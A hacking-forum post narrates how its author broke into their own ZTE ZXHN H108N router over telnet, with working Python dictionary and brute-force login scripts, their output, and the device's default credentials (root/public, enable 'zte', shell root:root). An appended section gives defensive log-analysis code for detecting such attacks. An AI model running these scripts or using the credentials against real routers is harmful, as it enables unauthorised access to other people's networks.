Hacking ZTE router (ZXHN H108N)
Hello


I did this for fun only... nothing really special, this is just a story (a true one)



Setup

OK, I have a ZTE router (ZXHN H108N) that I am connected to using the wlan0 interface (wireless), and the gateway is 192.168.1.1; the goal is to gain access to the shell!

I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!

Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hiding (going anonymous) by changing the MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!

So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:

Code:
nmap -F 192.168.1.1 -O

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT    STATE SERVICE
23/tcp  open  telnet
80/tcp  open  http
443/tcp open  https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

I used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP... but I would like to keep things ... simple!

So as you can see the OS is Linux 2.6.9-30 and there are three open ports... and holy crap this router is running Telnet!!! This should be fun (and it was!)

Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

      ************************************************************
                          Welcome to the world of CLI !
      ************************************************************
Username:

Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried a couple of random usernames (I had 3 chances before the connection is lost). The first one was "admin" and it returned "% Bad username!", but then I thought to myself: "If I want to access the shell as root... the username should be root, right? duh!!!", so I entered "root" and it was correct. But for the password I tried a couple of known passwords such as {toor, root, admin, admin123, ...} and none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted it NOW!!!

The Attack 0x00

So, what do I have so far?
  • IP address
  • Telnet access (opened)
  • CLI
  • Username

I need the password!

Well... for no reason I decided to write my own tool to crack the password using a dictionary attack. I was lucky, because I used a very small wordlist (1275 words only); the wordlist (or dictionary) is made of the most commonly used passwords. I don't remember where I got this list from, but it is not really important!

My code:
Code:
#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout

wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r') as f:
    # Read the file
    lines = f.readlines()
    # Telnet
    connection = telnetlib.Telnet()
    # Testing
    for password in lines:
        try:
            print '\r' + '\t' + time.ctime(time.time())  + '\t' + password.strip('\r\n'),
            stdout.flush()
            # Connect to the router (Telnet)
            connection.open('192.168.1.1')
            # Read until the server/Router asks for username
            chk = connection.read_until("Username:")
            # Send the username (root)
            connection.write("root\n")
            # Read until the server/Router asks for password!
            chk = connection.read_until('Password:')
            #send the password that we are currently testing
            connection.write(password)
            # this is important, I actually don't know
            # how to check if this password is correct
            # but I know that it will keep asking for the password in case if it is not!
            # So I will check for the "Password:" string and if I get a delay
            # for 1 second then this could mean that this is the correct password!
            chk = connection.read_until('Password:', 5)
            # Extra check: checking that the router didn't respond with "% Bad username!"
            if ('Bad' not in chk):
                connection.close()
                print "\nHacked: " + password
                break
            connection.close()
        except Exception, e:
            print 'Error (' + password.strip('\r\n') + '): ' + str(e)

Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly; the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.

So here is the output (took a while to finish):
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Script.py')
    Tue Jun 24 23:17:13 2014    888888 Error (888888): telnet connection closed
    Tue Jun 24 23:17:46 2014    angela1 Error (angela1): telnet connection closed
    .
    .
    .        
    Tue Jun 24 23:31:46 2014    parrot Error (parrot): telnet connection closed
    Tue Jun 24 23:32:10 2014    public  
Hacked: public

Bingo! The password is "public", time to test:

Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

          ************************************************************
                          Welcome to the world of CLI !
          ************************************************************
Username:root
Password:
CLI>?
Exec commands:
  enable  Turn on privileged commands.
  exit    Quit from telnet.
  ping    Ping the destination.
CLI>enable
Password:

Explanation:
  • I connect to 192.168.1.1:23 (telnet).
  • I enter the user name and password (root/public).
  • I see CLI> prompt (similar to Cisco routers) so I try '?' for help.
  • I see the enable command, which switches the CLI to config mode.

The Attack 0x01

And now I need the password to enable the config mode. I tested some passwords manually and guessed it successfully after a few attempts, BUT... let's try to brute-force the damn thing

The password is alphanumeric, so my charset will be:
Code:
>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

So I need a code to test all the combinations of these letters... crazy eh? because the total number of tries for only a three-character password would be:
Code:
>>> pow(len(string.ascii_letters + string.digits), 3)
238328

And for 8 characters:
Code:
>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896L

I have no time for this... so I will show you a simple script (just for fun) that will check only 3-character-long passwords (and only with the string.lowercase charset)

Code:
#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string

password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')

print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')

chk = connection.read_until('CLI>')

print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
    password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
    connection.write('enable\n')
    chk = connection.read_until('Password:')
    for i in range(0, 3):
        print '\r' + str(index) + '\t' + time.ctime(time.time())  + '\t' + password[index],
        stdout.flush()
        connection.write(password[index] + '\n')
        chk = connection.read_until('Password:', 1)
        index += 1
    if ('Bad' not in chk):
        print "\nHacked: " + password[index-1]
        break

Output (took more than 4 hours to finish)
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking...
17398    Wed Jun 25 00:59:00 2014    zte
Hacked: zte

Yes it was 'zte', something I had guessed by myself, and with this information I could actually access the config mode:

Code:
CLI>enable
Password:
CLI#?
Exec commands:
  allgreenledon   set all green led on
  allledoff       set all led off
  allledon        set all led on
  configure       Enter configuration mode.
  disable         Exit from privilege mode.
  exit            Quit from telnet.
  macaddr         show or set mac address
  ping            Ping the destination.
  reboot          Reboot device.
  reset           reset device
  restoredefault  Reset to factory configuration.
  serialnumber    get or set SN
  swversion       show software version
CLI#shell
ZXHN H108N
Login: root
Password:
Password is incorrect
Password:
Password is incorrect
Password:

BusyBox v1.01 (2013.07.10-08:47+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)

So the username and the password for the shell are root:root (easy eh?)

Conclusion
If your router is using Telnet... get another one! If it does use SSH, check the version and security! Be very careful with these issues; a misconfigured network device can be the worst nightmare one can have if a hacker finds out about it! So always check and double check your network configuration and the devices you use!

Thank you and please leave your comment[s] or question[s]

[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haki...-TL-WR740N
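The post shows what a telnet dictionary attack looks like from the attacker's side: one new session per guess, up to three password prompts per session, the device dropping the connection, and finally one session that succeeds. Here is the defender's side as an added example (my code, not the original poster's script and not anything from ZTE): detection logic run over a few constructed router log lines. It assumes a syslog-style `telnetd` line of the form `login failed/succeeded for <user> from <ip>` and a fixed log year; both are placeholders, since real devices log in their own format and many consumer routers log nothing at all.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumption: the router ships telnetd auth events to syslog in this shape.
# This is a constructed format for the example, not ZXHN H108N output;
# adjust LOG_RE to whatever your device actually logs.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ telnetd\[\d+\]: "
    r"login (?P<outcome>failed|succeeded) for (?P<user>\S+) from (?P<src>\S+)$"
)
LOG_YEAR = 2014  # syslog lines carry no year; assumed so timestamps can be subtracted

# Constructed sample log lines (not real device output). One short session
# per guess, at most three failures per session, all from one source, and
# finally a success from that same source once a guess lands.
SAMPLE_LOG = """\
Jun 24 23:17:13 router telnetd[412]: login failed for root from 192.168.1.5
Jun 24 23:17:14 router telnetd[412]: login failed for root from 192.168.1.5
Jun 24 23:17:15 router telnetd[412]: login failed for root from 192.168.1.5
Jun 24 23:17:15 router telnetd[412]: connection closed from 192.168.1.5
Jun 24 23:17:20 router telnetd[413]: login failed for root from 192.168.1.5
Jun 24 23:17:21 router telnetd[413]: login failed for root from 192.168.1.5
Jun 24 23:17:22 router telnetd[413]: login failed for root from 192.168.1.5
Jun 24 23:17:22 router telnetd[413]: connection closed from 192.168.1.5
Jun 24 23:20:01 router telnetd[420]: login failed for admin from 192.168.1.9
Jun 24 23:32:10 router telnetd[470]: login succeeded for root from 192.168.1.5
"""


def parse_line(line):
    """Return (timestamp, outcome, user, source) for a login event, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    return ts, m.group("outcome"), m.group("user"), m.group("src")


def analyze(lines, window=60, threshold=5):
    """Flag a source once it has >= threshold failed logins inside `window`
    seconds, and flag any successful login from a source that already has
    that many failures. Counting is per source, not per session, because the
    attacker gets a fresh session (and a fresh three tries) for every guess."""
    recent = defaultdict(deque)   # source -> failure timestamps still in the window
    total = defaultdict(int)      # source -> all failures seen so far
    flagged = set()
    alerts = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue                # e.g. "connection closed" lines
        ts, outcome, user, src = event
        if outcome == "failed":
            q = recent[src]
            q.append(ts)
            total[src] += 1
            # drop failures that have fallen out of the sliding window
            while q and (ts - q[0]).total_seconds() > window:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"type": "bruteforce", "source": src, "user": user,
                               "failures_in_window": len(q), "at": ts})
        elif total[src] >= threshold:
            # a success after a run of failures means the guess worked:
            # treat the account as compromised, not just "under attack"
            alerts.append({"type": "success_after_failures", "source": src,
                           "user": user, "prior_failures": total[src], "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```

The `success_after_failures` alert is the one that corresponds to the "Hacked: public" moment in the post, and it is the one worth paging on; the plain `bruteforce` alert fires earlier, on the fifth failure within the window, and is mostly useful for blocking the source. The thresholds are tunable placeholders: a tighter window (say 5 seconds) would miss the spread-out guessing in the sample while still catching the eventual success, which is why the two signals are kept separate.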





Messages In This Thread
Hacking ZTE router (ZXHN H108N) - by Ligeti - 06-24-2014, 11:24 PM
RE: Hacking ZTE router (ZXHN H108N) - by B2OOR - 11-01-2016, 02:25 AM
RE: Hacking ZTE router (ZXHN H108N) - by xssinj - 03-04-2017, 02:14 PM


